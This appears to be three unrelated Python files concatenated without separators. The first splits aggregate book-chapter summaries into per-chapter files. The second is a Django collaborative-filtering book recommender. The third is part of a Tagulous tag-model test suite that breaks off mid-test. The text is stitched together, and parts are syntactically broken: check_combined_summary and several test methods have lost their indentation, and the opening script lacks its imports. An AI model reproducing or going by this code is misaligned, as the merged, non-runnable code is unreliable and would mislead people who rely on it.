f_all_errors = open("splitting_aggregates_errors.txt", "w")
# Log file to debug the section splits
f_matched_section_splits = open("matched_section_splits.txt", "w")
def romanToInt(s):
    """Convert a roman numeral string to an int.

    Generalized to accept both lower- and upper-case numerals (the input
    is lower-cased first; lower-case behavior is unchanged). Subtractive
    pairs (iv, ix, xl, xc, cd, cm) are handled via an explicit two-char
    lookup table.

    :param s: roman numeral, e.g. 'xiv' or 'XIV'
    :return: integer value
    :raises KeyError: if s contains a non-roman character
    """
    roman = {'i': 1, 'v': 5, 'x': 10, 'l': 50, 'c': 100, 'd': 500, 'm': 1000,
             'iv': 4, 'ix': 9, 'xl': 40, 'xc': 90, 'cd': 400, 'cm': 900}
    s = s.lower()
    i = 0
    num = 0
    while i < len(s):
        # Prefer the two-character subtractive form when it applies
        if i + 1 < len(s) and s[i:i + 2] in roman:
            num += roman[s[i:i + 2]]
            i += 2
        else:
            num += roman[s[i]]
            i += 1
    return num
# Saves the summaries we have broken down into new section jsons,
# Along with the new section name
def save_separated_summaries(separated_summaries, summary_json, summary_path, section_summary_title):
    """Write each separated section summary into its own *_part_N.txt json file.

    :param separated_summaries: dict section name -> summary text
    :param summary_json: original summary json (analysis/url are copied over)
    :param summary_path: path of the original aggregate *_part_0.txt file
    :param section_summary_title: unused; kept for caller compatibility
    :return: number of *new* summaries created (count - 1, since the original
             file already accounted for one summary)
    """
    old_section_name = os.path.basename(summary_path).split('_part_0.txt')[0]
    summary_dir = os.path.dirname(summary_path)
    count = 0
    for key, summary in separated_summaries.items():
        count += 1
        section_json = {
            'name': key,
            'summary': summary,
            'analysis': summary_json.get('analysis', ""),
            'url': summary_json.get('url', ""),
        }
        fout_name = os.path.join(summary_dir, old_section_name + "_part_{}.txt".format(str(count)))
        print ("fout_name: ", fout_name)
        # `with` guarantees the json is flushed and the handle closed
        # (the original leaked every output handle).
        with open(fout_name, "w") as fout:
            json.dump(section_json, fout)
    return count - 1
def replace_pat2(matched_str):
    """re.sub-style callback: rewrite a spelled-out number in the match as digits.

    Reads the number word from group(1) (or group(2) when group(1) is empty)
    and replaces it inside the full matched text with its numeric form via
    word2number. If group(1) is not parseable as a number word, falls back
    to group(2).
    """
    # print (matched_str.groups())
    # try:
    if matched_str.group(1) != "":
        num = matched_str.group(1).strip()
    else:
        num = matched_str.group(2).strip()
    # print ("num: ", num)
    try:
        ret = matched_str.group(0).replace(num, str(w2n.word_to_num(num)))
    except ValueError:
        # group(1) was not a valid number word; retry with group(2)
        num = matched_str.group(2).strip()
        ret = matched_str.group(0).replace(num, str(w2n.word_to_num(num)))
    # print ("ret: ", ret, "\n")
    return ret
# Separates the multiple chapter summaries we have found
def separate_mulitple_summaries(summary_content, matched_numeric_roman, matched_numbers_nl, section_name_prefix, summary_path):
    """Split one aggregate summary text into per-section summaries.

    Walks the text sentence by sentence; whenever a line starts with a
    chapter/scene/act header it closes the summary accumulated so far under
    the previous header's section name.

    :param summary_content: full aggregate summary text
    :param matched_numeric_roman: unused here (computed by the caller)
    :param matched_numbers_nl: unused here (computed by the caller)
    :param section_name_prefix: optional "book/part N" prefix for section names
    :param summary_path: only used for error logging (writes to the module
        global f_all_errors)
    :return: dict section name -> summary text
    """
    # print ("summary_content: ", summary_content)
    # All patterns should match starting of line.
    # NOTE(review): the optional prefix is '(?:PARAGRAPH>)?' — it only skips
    # the tail of a '<PARAGRAPH>' tag, leaving '<PARA' behind; presumably
    # '(?:<PARAGRAPH>)?' was intended — confirm before changing.
    pat_num_rom = '^(?:PARAGRAPH>)?((chapter|scene) ([ivxl|0-9]{1,}))[^a-z0-9]?'
    pat_act_scene = '^(?:PARAGRAPH>)?((act) ([ivxl|0-9]{1,})[,-]{0,}[ ]{1,}(scene) ([ivxl|0-9]{1,}))[^a-z0-9]?'
    pat_nl = '^(?:PARAGRAPH>)?((chapter|scene) (twenty|thirty|forty|fifty|sixty|seventy|eighty|ninety|eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)([-|–]?)(eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)?)(.*$)'
    # Also need to convert in this case
    # Break the entire summary content into lines and check for <PARAGRAPH> tag too in the regex
    # We break on period, exclamation mark and question mark, all 3
    lines = list(filter(None, re.split("[.|!|?|\"]", summary_content)))
    # dict with both the summary and the section name
    summaries = {}
    summary = []
    section_name = ""
    for line in lines:
        line = line.strip()
        line = remove_prefixes_line(line)
        # Because we can have a mix of roman, numeric and natural language numbers... :(
        if re.match(pat_num_rom, line, re.IGNORECASE) or re.match(pat_nl, line, re.IGNORECASE) or re.match(pat_act_scene, line, re.IGNORECASE):
            # if 'chapter' in line or 'act' in line: #What about act keyword?
            # Why do we even need this check?
            if summary == []:
                # First header seen: nothing accumulated yet, just start
                summary.append(line)
            else:
                # Close out the previous section under its name
                if section_name_prefix != "" and 'act' not in section_name.strip().lower():
                    # print ("added section_name_prefix: ", section_name_prefix)
                    section_name = section_name_prefix + ", " + section_name
                if section_name not in summaries:
                    # print ("section_name adding: ", section_name)
                    summaries[section_name] = ". ".join(summary)
                if section_name.strip() == "":
                    f_all_errors.write("Section name empty" + "\t" + summary_path)
                    f_all_errors.write("\n")
                summary = []
                summary.append(line)
            # Extract the new section name from whichever pattern matched
            if re.match(pat_nl, line, re.IGNORECASE):
                section_name = re.match(pat_nl, line, re.IGNORECASE).group(1)
                splits = section_name.split()
                # Normalize the spelled-out number to digits
                section_name = " ".join([splits[0], str(w2n.word_to_num(splits[1]))])
                section_name = section_name.strip()
            elif re.match(pat_num_rom, line, re.IGNORECASE):
                prev_section_name = section_name
                section_name = re.match(pat_num_rom, line, re.IGNORECASE).group(1)
                # section_name = section_name.strip()
                # Not considered a legit match. Will have to check manually
                # if section_name == 'chapter i':
                #     section_name = prev_section_name
                # print ("section_name: ", section_name)
            elif re.match(pat_act_scene, line, re.IGNORECASE):
                section_name = re.match(pat_act_scene, line, re.IGNORECASE).group(1)
                section_name = section_name.strip()
        else:
            # Regular sentence: accumulate into the current section
            summary.append(line)
    # Flush the final section
    if summary != []:
        if section_name_prefix != "" and section_name != "" and 'act' not in section_name.strip().lower():
            section_name = section_name_prefix + ", " + section_name
        if section_name not in summaries:
            summaries[section_name] = ".".join(summary)
    return summaries
# Checks for the presence of multiple unique chapters present in the book.
# If multiple keywords like 'Chapter' 'Scene' etc. followed by a number are found,
# it points towards multiple individual summaries, since we already know it is an aggregate.
def check_multiple_summaries(summary):
    """Detect whether an aggregate summary contains multiple per-chapter summaries.

    :param summary: aggregate summary text
    :return: (matched_numeric_roman, matched_numbers_nl) — flags (0/1) for a
        leading "Chapter 1"/"Scene iv"/"Act 1, Scene 3" header and for a
        natural-language "chapter twenty-two" header respectively.
    """
    summary = summary.strip().replace("\n", " ")
    # BUGFIX: the original prefixed each pattern with [<PARAGRAPH>]{0,},
    # which is a *character class* (any run of the letters < P A R G H >),
    # not the literal tag — so e.g. "RAGchapter 1" matched. Replaced with
    # an optional non-capturing group for the literal tag, matching the
    # style already used in separate_mulitple_summaries.
    # Matches Chapter 1, followed by some string
    pat1 = "^(?:<PARAGRAPH>)?(?:chapter|scene) (?:[ivxl|0-9]{1,})[^a-z](.*$)"
    # Matches chapter twenty-two followed by some string
    pat7 = '^(?:<PARAGRAPH>)?(?:chapter|scene) ((twenty|thirty|forty|fifty|sixty|seventy|eighty|ninety|eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)([,-]?)(eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)?)(.*$)'
    # Matches Act 1, Scene 3 and Act 1 Scene 3
    pat_act_scene = '^(?:<PARAGRAPH>)?((act) ([ivxl|0-9]{1,})[,-]{0,}[ ]{1,}(scene) ([ivxl|0-9]{1,}))[^a-z](.*$)'
    # Flag for matching with roman or numeric numbers
    matched_numeric_roman = 0
    # stands for matched numbers natural language
    matched_numbers_nl = 0
    if re.match(pat1, summary, re.IGNORECASE):
        matched_numeric_roman = 1
    if re.match(pat_act_scene, summary, re.IGNORECASE):
        matched_numeric_roman = 1
    if re.match(pat7, summary, re.IGNORECASE):
        matched_numbers_nl = 1
    return matched_numeric_roman, matched_numbers_nl
def check_book_num_prefix(summary_id):
    """Extract a leading "book N" / "part N" prefix from a summary id.

    Returns the prefix (e.g. "book 2") or "" when the id has none.
    """
    prefix_pat = '^((book|part) [ivxl|0-9]{1,})[, ]{0,}(.*$)'
    match = re.match(prefix_pat, summary_id, re.IGNORECASE)
    return match.group(1) if match else ""
# Remove prefixes from every summary to further check for the combined/multiple summaries
def remove_prefixes_line(line):
    """Strip known boilerplate prefixes from a single summary line.

    Drops "Read a translation of ... Scene/Chapter N -" lead-ins,
    "of Vol. X" markers and "summary"/"summary and analysis" labels, then
    trims any leading punctuation that remains.
    """
    line = line.strip().replace("\n", " ")

    # "Read a translation of ... scene/chapter N -" lead-in
    translation_pat = '^(Read a translation of.*?(scene|chapter) [ivxl|0-9]{1,}[ ]{0,}-[ ]{0,})(.*$)'
    match = re.match(translation_pat, line, re.IGNORECASE)
    if match:
        line = line.replace(match.group(1), "").strip()

    # "of Vol. II," style marker
    vol_pat = '^((of Vol.)[ ]{0,}[ivxl][ ]{0,}[:|,|-]{0,})'
    match = re.search(vol_pat, line, re.IGNORECASE)
    if match:
        line = line.replace(match.group(0), "").strip()

    # "summary:" / "summary and analysis:" label
    label_pat = '^((summary|summary and analysis|summary & analysis)[ ]{0,}[:|,|-]{0,})'
    match = re.search(label_pat, line, re.IGNORECASE)
    if match:
        line = line.replace(match.group(0), "").strip()

    # Drop any leading punctuation left behind by the removals
    return line.lstrip(punctuation).strip()
# Remove prefixes from every summary to further check for the combined/multiple summaries
def remove_prefixes_summary(summary):
    """Drop leading text that precedes the first chapter/scene marker.

    For each marker pattern, the lazy prefix before the marker is removed —
    but only when it is shorter than 150 words, so we never discard a large
    chunk of real summary text. Multiple prefixes can be removed in turn.
    """
    summary = summary.strip().replace("\n", " ")
    chap_pat = '(.*?)Chapter [ivxl|0-9]{1,}[^a-z]'
    # TODO(review): original note said Scene should only apply when no
    # 'Act' precedes it — behavior kept unchanged here.
    scene_pat = '(.*?)Scene [ivxl|0-9]{1,}[^a-z]'
    nl_pat = '(.*?)(chapter|scene ((twenty|thirty|forty|fifty|sixty|seventy|eighty|ninety|eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)([,-]?)(eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)?)).*$'
    for pat in (chap_pat, scene_pat, nl_pat):
        match = re.search(pat, summary, re.IGNORECASE)
        # If we are removing too many words, better to not remove!
        if match and len(match.group(1).split()) < 150:
            summary = summary.replace(match.group(1), "").strip()
    return summary.strip()
#combined summary doesn't have summaries of separate chapters combined together
def check_combined_summary(summary):
#TODO: Should we add a check for a scene or act range too?
pat = '^((summary|summary and analysis|summary & analysis)[ ]{0,}[:|,|-]{0,})'
if re.search(pat, summary, re.IGNORECASE):
to_replace = re.match(pat, summary, re.IGNORECASE).group(0)
summary = summary.replace(to_replace,"")
summary = summary.strip()
pat2 = '^[ ]{0,}[<PARAGRAPH>]{0,}[ ]{0,}((chapters|chapter) ([ivxl|0-9+]{1,}[,|-|–]){1,}[ivxl|0-9+]{1,})(.*$)'
combined_summary_flag = 0
if re.search(pat2, summary, re.IGNORECASE):
print (re.match(pat2, summary, re.IGNORECASE).groups())
prefix = re.match(pat2, summary, re.IGNORECASE).group(1)
summary = summary.replace(prefix,"")
combined_summary_flag = 1
# If there is no differentiating keyword it might still be a combined summary!
return combined_summary_flag, summary.strip()
def get_summary_files_chapter_count(x):
    """Count TOC chapters and summary part-files already on disk for a book.

    :param x: matched-book record (dict) with a 'chapter_path' key
    :return: (num_toc_lines, summary_dir_count)

    NOTE(review): this reads the module-level globals `chapterized_books_dir`
    and `summary_path`; `summary_path` is only assigned inside the main loop
    below, so this function must be called after it has been set — confirm
    before reusing elsewhere.
    """
    chapter_dir = dirname(x['chapter_path'])
    toc_path = os.path.join(chapterized_books_dir, chapter_dir, "toc.txt")
    # `with` closes the TOC handle (the original leaked it on every call)
    with open(toc_path, "r") as f_toc:
        f_toc_lines = f_toc.readlines()
    num_toc_lines = len(f_toc_lines)
    # A bare newline entry is not a real TOC row
    if "\n" in f_toc_lines:
        num_toc_lines = num_toc_lines - 1
    summary_dir = dirname(summary_path)
    summary_file_list = os.listdir(summary_dir)
    summary_dir_count = len(summary_file_list)
    # The book-level overview file is not a chapter summary
    if 'overview.txt' in summary_file_list or 'overview.json' in summary_file_list:
        summary_dir_count = summary_dir_count - 1
    return num_toc_lines, summary_dir_count
# --- main script: walk every matched record, find aggregate summaries that
# --- are really several chapter summaries glued together, and split them ---
multiple_summaries = 0
not_flagged = 0
total_aggregates = 0
total_new_summaries = 0
counter = 0
books_set = []
fp = open(matched_books, "r")
fp_lines = fp.readlines()
for line in tqdm(fp_lines):
    line = line.rstrip().strip()
    x = json.loads(line)
    counter += 1
    books_set.append(x['bid'])
    # NOTE(review): summaries_counted and prev_book_unique_id are re-reset on
    # every iteration, so the "new book" comparison below can never fire —
    # looks like dead logic; confirm intent before relying on these counters.
    summaries_counted = 0
    prev_book_unique_id = ""
    book_unique_id = x['book_id'].split('.')[0] + "." + x['source']
    if x['is_aggregate']:
        total_aggregates += 1
        if (book_unique_id != prev_book_unique_id) and prev_book_unique_id != "":
            summaries_counted = 0
        summary_path = os.path.join("../", x['summary_path'])
        if not os.path.exists(summary_path):
            # Summary directory missing
            continue
        num_toc_lines, summary_dir_count = get_summary_files_chapter_count(x)
        # No splitting needed if we have much lesser files that those exist in the TOC
        # This is mainly for plays where we may have just Act 1, so trying to split Act 1 actually reduces a data point
        if summary_dir_count + 1 > num_toc_lines: # number of toc lines are usually more only or the same. +1 to handle prologue, intro, epilogue etc
            f_all_errors.write("Too many files already:" + "\t" + summary_path)
            f_all_errors.write("\n")
            continue
        print ("summary_dir_count: ", summary_dir_count)
        print ("num_toc_lines: ", num_toc_lines)
        # Error can occur if we have multiple occurences of the same book and source..
        try:
            fx = open(summary_path, "r")
        except Exception as e:
            print (e)
            f_all_errors.write("Error loading summary path" + "\t" +summary_path)
            f_all_errors.write("\n")
            continue
        summary_json = json.load(fx)
        summary_content = summary_json['summary']
        og_summary_content = summary_content
        # Strip boilerplate prefixes, then the "Chapters 1-3" range header
        summary_content = remove_prefixes_summary(summary_content)
        combined_summary_flag, summary_content = check_combined_summary(summary_content)
        # Combined check may return true and the text can still have multiple summaries. Eg. Chapters 4-5 Chapter 4 ....
        # Treat the above as a prefix removing step for now
        # print ("x: ", x)
        matched_numeric_roman, matched_numbers_nl = check_multiple_summaries(summary_content)
        # If it is not a combined summary of multiple chapters,
        # But has multiple summaries with either roman, numeric or natural language numbers
        # if not combined_summary_flag and (matched_numeric_roman or matched_numbers_nl):
        if (matched_numeric_roman or matched_numbers_nl):
            # section_name_prefix = check_book_num_prefix(x['summary_id'])
            section_name_prefix = ""
            book_id_splits = x['book_id'].split('.')
            # A 3-part book id carries a middle "book/part" component
            if len(book_id_splits) == 3:
                section_name_prefix = book_id_splits[1]
            #TODO: Look into fixing splits obtained from part 1-2.chapters 11-1 type of book ids. Use regex!
            # Ans: In this case we are currently just capturing the chapter number. Usually we are to match just on the basis
            # of that along with the order of the section files
            if '-' in section_name_prefix or section_name_prefix == 'epilogue':
                section_name_prefix = ""
            section_summary_title = x['summary_id']
            #If there are multiple occurences of the section_name_prefix, then don't use any prefix
            if section_name_prefix != "":
                if len(re.findall("act ", section_summary_title)) > 1:
                    section_name_prefix = ""
            # print ("section_name_prefix: ", section_name_prefix)
            separated_summaries = separate_mulitple_summaries(summary_content, matched_numeric_roman, matched_numbers_nl, section_name_prefix, summary_path)
            print ("separated_summaries keys: ", separated_summaries.keys())
            # No need to separate and use the new section name if we only have one single summary found after breaking
            # Also protects against some false positives wrt splitting the sections
            if len(separated_summaries.keys()) == 1:
                #keep it saved normally
                continue
            else:
                multiple_summaries += 1
                # If there is an empty section name, it means we removed some part of the summary as a prefix, which doesn't have an associated
                # section name. In such a case, refrain from the splitting the summary into chapters
                if '' not in separated_summaries.keys() and ' ' not in separated_summaries.keys():
                    summaries_counted += save_separated_summaries(separated_summaries, summary_json, summary_path, section_summary_title)
                    # Remove the old summary path
                    os.remove(summary_path)
                    f_matched_section_splits.write(section_summary_title + " : ")
                    for key, val in separated_summaries.items():
                        f_matched_section_splits.write(key + " | ")
                        total_new_summaries += 1
                    f_matched_section_splits.write(summary_path)
                    f_matched_section_splits.write("\n")
        else:
            # No need to separate, save as is
            not_flagged += 1
print ("multiple_summaries to split: ", multiple_summaries)
print ("total_new_summaries: ", total_new_summaries)
print ("total books: ", len(set(books_set)))
print ("no need to separate: ", not_flagged)
print ("total aggregates: ", total_aggregates)
|
# coding:utf-8
# Recommendation algorithm script, including user-based collaborative filtering
import math
import operator
import time
from django.core.cache import cache
import MySQLdb
begin = time.time()  # script start time; read only by the commented-out timing debug print below
from django.db import connection
def get_default_train_dict():
    """
    Build the user-item training model from the user_record.user_item table.
    :return: dict mapping user -> list of item ids
    """
    train_dict = dict()
    cursor = connection.cursor()
    sql = "select distinct * from user_record.user_item"
    cursor.execute(sql)
    rs = cursor.fetchall()
    for row in rs:
        user = row[0]
        items_in_string = row[1]
        # Items are stored as an "&"-joined string; drop the empty entry the
        # split produces (presumably from a trailing '&' — TODO confirm format)
        items_list = items_in_string.split("&")
        items_list.remove("")
        # Keep only the first row seen per user (Python 2 dict.has_key)
        if not train_dict.has_key(user):
            train_dict[user] = items_list
        else:
            continue
    return train_dict
def single_user_similarity(train_dict, sys_user, sys_user_items):
    """Compute similarity between sys_user and every other user (user-based CF).

    Builds the item -> users inverted table from the DB, accumulates
    co-occurrence scores dampened by item popularity, then normalises by
    the two users' item counts.

    :param train_dict: user -> item-list training model
    :param sys_user: the target user (excluded from the result)
    :param sys_user_items: items of the target user
    :return: dict other_user -> similarity weight
    """
    co_counts = dict()
    for item in sys_user_items:
        new_cursor = connection.cursor()
        # SECURITY FIX: parameterised query instead of "...item='%s'" % item
        # string interpolation, which was an SQL-injection risk.
        new_cursor.execute(
            "select users from user_record.item_users where item=%s", [item]
        )
        users = [row[0] for row in new_cursor.fetchall()]
        for v in users:
            if v == sys_user:
                continue
            if v not in co_counts:
                co_counts[v] = 0.0
            # Dampen popular items: each shared item contributes 1/log(1+n)
            co_counts[v] += 1 / math.log(1 + len(users))
    # Compute the final similarity matrix W
    print("calc the W")
    W = dict()
    for v, cuv in co_counts.items():
        # (The original pre-initialised W[v] = 0.0 and immediately
        # overwrote it; the dead init is removed.)
        W[v] = cuv / math.sqrt(len(sys_user_items) * len(train_dict[v]))
    return W
def single_user_recommend(user, single_related_users, K, add_sysuser_train_dict):
    """Score items for `user` from its K most similar users.

    For every item a neighbour has interacted with (and `user` has not),
    the neighbour's similarity weight is added to the item's score.

    :param user: target user id
    :param single_related_users: dict other_user -> similarity weight
    :param K: number of top neighbours to consider
    :param add_sysuser_train_dict: user -> item list (must include `user`)
    :return: dict item -> interest score
    """
    rank = dict()
    # Pick the K neighbours with the highest similarity
    neighbours = sorted(
        single_related_users.items(), key=operator.itemgetter(1), reverse=True
    )[0:K]
    seen = add_sysuser_train_dict[user]
    for v, wuv in neighbours:
        for item in add_sysuser_train_dict[v]:
            # Skip items the user has already interacted with
            if item in seen:
                continue
            # `in` replaces Python-2-only dict.has_key
            if item not in rank:
                rank[item] = 0.0
            rank[item] += wuv
    return rank
# rank = SingleRecommend('TANG',related_users,30,train_dict)
# new_list = sorted(rank.items(),key=operator.itemgetter(1),reverse=True)
# print "get the recommend--------"
#
# for i in new_list[25:50]:
# print i
# print "------"+str(time.time()-begin)+"-------"
def book_recommend(username, douban_id_list):
    """Recommend up to 20 books for `username` via user-based CF.

    Uses the cached user-item training dict when available; otherwise
    rebuilds it from the DB and caches it for 30 days. Blacklisted douban
    ids are filtered out of the result.

    :param username: target user
    :param douban_id_list: douban ids of books the user has interacted with
    :return: list of (douban_id, score) tuples, best first, at most 20
    """
    # Douban ids excluded from recommendations (editorial blacklist).
    # Hoisted into one frozenset: the original duplicated this 85-id list
    # in both branches.
    excluded = frozenset([
        '1770782', '1084336', '1008145', '1082154', '25862578',
        '3259440', '1046265', '3211779', '2567698', '1017143',
        '1007305', '1016300', '1040771', '20427187', '6082808',
        '5275059', '1461903', '1200840', '1141406', '1041007',
        '10554308', '3066477', '1068920', '4238362', '5363767',
        '4242172', '1083428', '1090043', '1026425', '2256039',
        '1873231', '1071241', '3995526', '1400705', '1039487',
        '1041482', '1059406', '1023045', '2209098', '4742918',
        '1022060', '4886245', '3879301', '1529893', '1009257',
        '1057244', '1858513', '1066462', '4913064', '1082334',
        '25747921', '2062200', '1255625', '3646172', '1049219',
        '1975797', '4074636', '1432596', '2250587', '1045818',
        '1029791', '1049189', '1948901', '1361264', '10594787',
        '1013129', '2022979', '3426869', '1059419', '1050339',
        '1085860', '1007914', '1019568', '26340138', '1089243',
        '1065970', '3598313', '4714734', '1827374', '2159042',
        '1029159', '6388661', '1030052', '3369600', '1949338',
        '5317075',
    ])
    default_train_dict = cache.get("train_dict_cache")
    if default_train_dict:
        print("print get train_dict_cache")
    else:
        default_train_dict = get_default_train_dict()
        cache.set("train_dict_cache", default_train_dict, 2592000)  # 30 days
        print("success get the train_dict")
    related_user = single_user_similarity(default_train_dict, username, douban_id_list)
    default_train_dict[username] = douban_id_list
    rank = single_user_recommend(username, related_user, 30, default_train_dict)
    new_list = sorted(rank.items(), key=operator.itemgetter(1), reverse=True)
    # BUGFIX: the original called new_list.remove(book) while iterating
    # new_list itself, which skips the element following every removal, so
    # some blacklisted books leaked through. Filter into a new list instead.
    new_list = [book for book in new_list if book[0] not in excluded]
    return new_list[:20]
def user_recommend(username, douban_id_list):
    """Return the users most similar to `username` (top 9).

    :param username: target user
    :param douban_id_list: douban ids of the user's books
    :return: list of (user, similarity) tuples, best first, at most 9
    """
    default_train_dict = cache.get("train_dict_cache")
    if not default_train_dict:
        default_train_dict = get_default_train_dict()
        # Cache the rebuilt dict for 30 days — consistent with
        # book_recommend (the original rebuilt it on every miss without
        # ever caching it here).
        cache.set("train_dict_cache", default_train_dict, 2592000)
    user_list = single_user_similarity(default_train_dict, username, douban_id_list)
    new_list = sorted(user_list.items(), key=operator.itemgetter(1), reverse=True)
    K_list = new_list[0:9]
    # Debug output (order unified across both branches)
    print("here")
    print(K_list)
    return K_list
# -*- coding: utf-8 -*-
"""
Tagulous test: Tag models
Modules tested:
tagulous.models.models.BaseTagModel
tagulous.models.models.TagModel
tagulous.models.models.TagModelManager
tagulous.models.models.TagModelQuerySet
"""
import unittest
from django.db import IntegrityError
from django.test import TestCase
import tagulous.settings as tagulous_settings
from tagulous import models as tag_models
from tagulous import utils as tag_utils
from tagulous.settings import SLUG_TRUNCATE_UNIQUE
from tests.lib import TagTestManager
from tests.tagulous_tests_app import models as test_models
class TagModelTest(TagTestManager, TestCase):
"""
Test tag model basics
"""
manage_models = [
test_models.MixedTest,
test_models.MixedRefTest,
test_models.NonTagRefTest,
]
    def setUpExtra(self):
        # Convenience aliases for the shared tag model and the three tagged
        # models used throughout these tests
        self.tag_model = test_models.MixedTestTagModel
        self.model1 = test_models.MixedTest
        self.model2 = test_models.MixedRefTest
        self.model_nontag = test_models.NonTagRefTest
def test_tags_equal_instance(self):
"Test TagModel.__eq__ with instances"
t1a = self.tag_model.objects.create(name="one")
t1b = self.tag_model.objects.get(name="one")
self.assertEqual(t1a, t1b)
def test_tags_equal_string(self):
"Test TagModel.__eq__ with instance and string"
t1 = self.tag_model.objects.create(name="one")
self.assertEqual(t1, "one")
def test_tags_not_equal_instance(self):
"Test TagModel.__ne__ with instances"
t1 = self.tag_model.objects.create(name="one")
t2 = self.tag_model.objects.create(name="two")
self.assertNotEqual(t1, t2)
    def test_tags_not_equal_string(self):
        # Docstring fixed: this exercises __ne__ (the original said __eq__)
        "Test TagModel.__ne__ with instance and string"
        t1 = self.tag_model.objects.create(name="one")
        self.assertNotEqual(t1, "two")
def test_get_absolute_url_defined(self):
"Test get_absolute_url when passed in field definition"
t1 = self.tag_model.objects.create(name="one")
self.assertEqual(t1.get_absolute_url(), "url for one")
def test_get_absolute_url_not_defined(self):
"Test get_absolute_url when passed in field definition"
t1 = test_models.SimpleMixedTest.tags.tag_model.objects.create(name="one")
with self.assertRaises(AttributeError) as cm:
t1.get_absolute_url()
self.assertEqual(
str(cm.exception),
"'Tagulous_SimpleMixedTest_tags' has no attribute 'get_absolute_url'",
)
def test_name_field_length(self):
"""
Value is initialized in setup.py runtests() settings
"""
self.assertEqual(
self.tag_model._meta.get_field("name").max_length,
tagulous_settings.NAME_MAX_LENGTH,
)
def test_slug_field_length(self):
"""
Value is initialized in setup.py runtests() settings
"""
self.assertEqual(
self.tag_model._meta.get_field("slug").max_length,
tagulous_settings.SLUG_MAX_LENGTH,
)
def test_empty_name_raises_integrity_error(self):
with self.assertRaises(IntegrityError) as cm:
self.tag_model.objects.create(name=None)
err = str(cm.exception).lower()
self.assertTrue("name" in err)
self.assertTrue("null" in err)
def assertRelatedExists(self, related_fields, match_model, field_name):
"""
Look through the related fields and find the field which refers to the
specified model; fail if it does not exist
"""
match_field = match_model._meta.get_field(field_name)
for related in related_fields:
if related.related_model == match_model and related.field == match_field:
return related
self.fail("Expected related field not found")
def test_get_related_fields(self):
"Check the class method returns a list of related fields"
related_fields = self.tag_model.get_related_fields()
self.assertEqual(len(related_fields), 4)
# FK comes before M2M, so first two will be the SingleTagFields
self.assertRelatedExists(related_fields, self.model1, "singletag")
self.assertRelatedExists(related_fields, self.model2, "singletag")
# Now the TagFields
self.assertRelatedExists(related_fields, self.model1, "tags")
self.assertRelatedExists(related_fields, self.model2, "tags")
def test_get_related_fields_standard(self):
"Check the class method can also find standard relationships"
related_fields = self.tag_model.get_related_fields(include_standard=True)
self.assertEqual(len(related_fields), 6)
# SingleTagFields/FKs
self.assertRelatedExists(related_fields, self.model1, "singletag")
self.assertRelatedExists(related_fields, self.model2, "singletag")
self.assertRelatedExists(related_fields, self.model_nontag, "fk")
# TagFields/M2Ms
self.assertRelatedExists(related_fields, self.model1, "tags")
self.assertRelatedExists(related_fields, self.model2, "tags")
self.assertRelatedExists(related_fields, self.model_nontag, "mm")
    def test_get_related_objects(self):
        """
        Check the class method returns a list of related models, fields and
        instances
        """
        t1 = self.create(self.model1, name="Test 1", singletag="Mr", tags="blue")
        t2 = self.create(self.model1, name="Test 2", singletag="Mr", tags="green")
        t3 = self.create(self.model2, name="Test 3", singletag="Mrs", tags="green")
        t4 = self.create(self.model2, name="Test 4", singletag="Mr", tags="green")
        #
        # Check Mr
        #
        singletag1 = self.tag_model.objects.get(name="Mr")
        rel_st1 = singletag1.get_related_objects()
        self.assertEqual(len(rel_st1), 2)
        # Don't assume order - we could probably guess reliably, but
        # why risk it in tests
        # rel_st1 is list of [model, field, [instances]]
        if rel_st1[0][0] == self.model1:
            rel_st1_m1 = rel_st1[0]
            rel_st1_m2 = rel_st1[1]
        else:
            rel_st1_m1 = rel_st1[1]
            rel_st1_m2 = rel_st1[0]
        # model1 entry: both t1 and t2 have singletag "Mr"
        self.assertEqual(rel_st1_m1[0], self.model1)
        self.assertEqual(rel_st1_m1[1], self.model1._meta.get_field("singletag"))
        self.assertEqual(len(rel_st1_m1[2]), 2)
        self.assertEqual(rel_st1_m1[2][0], t1)
        self.assertEqual(rel_st1_m1[2][1], t2)
        # model2 entry: only t4 has singletag "Mr"
        self.assertEqual(rel_st1_m2[0], self.model2)
        self.assertEqual(rel_st1_m2[1], self.model2._meta.get_field("singletag"))
        self.assertEqual(len(rel_st1_m2[2]), 1)
        self.assertEqual(rel_st1_m2[2][0], t4)
        #
        # Check Mrs
        #
        singletag2 = self.tag_model.objects.get(name="Mrs")
        rel_st2 = singletag2.get_related_objects()
        self.assertEqual(len(rel_st2), 1)
        rel_st2_m1 = rel_st2[0]
        self.assertEqual(rel_st2_m1[0], self.model2)
        self.assertEqual(rel_st2_m1[1], self.model2._meta.get_field("singletag"))
        self.assertEqual(len(rel_st2_m1[2]), 1)
        self.assertEqual(rel_st2_m1[2][0], t3)
        #
        # Check blue
        #
        tags1 = self.tag_model.objects.get(name="blue")
        rel_t1 = tags1.get_related_objects()
        self.assertEqual(len(rel_t1), 1)
        rel_t1_m1 = rel_t1[0]
        self.assertEqual(rel_t1_m1[0], self.model1)
        self.assertEqual(rel_t1_m1[1], self.model1._meta.get_field("tags"))
        self.assertEqual(len(rel_t1_m1[2]), 1)
        self.assertEqual(rel_t1_m1[2][0], t1)
        #
        # Check green
        #
        tags2 = self.tag_model.objects.get(name="green")
        rel_t2 = tags2.get_related_objects()
        self.assertEqual(len(rel_t2), 2)
        # Again, don't assume model order in the result
        if rel_t2[0][0] == self.model1:
            rel_t2_m1 = rel_t2[0]
            rel_t2_m2 = rel_t2[1]
        else:
            rel_t2_m1 = rel_t2[1]
            rel_t2_m2 = rel_t2[0]
        self.assertEqual(rel_t2_m1[0], self.model1)
        self.assertEqual(rel_t2_m1[1], self.model1._meta.get_field("tags"))
        self.assertEqual(len(rel_t2_m1[2]), 1)
        self.assertEqual(rel_t2_m1[2][0], t2)
        self.assertEqual(rel_t2_m2[0], self.model2)
        self.assertEqual(rel_t2_m2[1], self.model2._meta.get_field("tags"))
